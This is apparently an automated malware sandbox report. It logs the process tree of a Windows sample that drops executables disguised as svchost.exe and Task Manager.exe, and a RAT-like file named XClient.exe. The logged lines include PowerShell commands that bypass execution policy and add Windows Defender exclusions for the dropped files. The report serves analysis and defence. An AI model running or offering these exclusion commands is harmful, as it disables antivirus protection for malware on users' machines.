                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
                        Bypasses PowerShell execution policy
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess created: C:\Users\user\AppData\Roaming\All function.cmd "C:\Users\user\AppData\Roaming\All function.cmd" Jump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess created: C:\Users\user\AppData\Roaming\Task Manager.exe "C:\Users\user\AppData\Roaming\Task Manager.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeQueries volume information: C:\Users\user\Desktop\dLRcE11Dkl.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdQueries volume information: C:\Users\user\AppData\Roaming\All function.cmd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeQueries volume information: C:\Users\user\AppData\Roaming\Task Manager.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeQueries volume information: C:\Users\user\AppData\Roaming\All function.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeQueries volume information: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
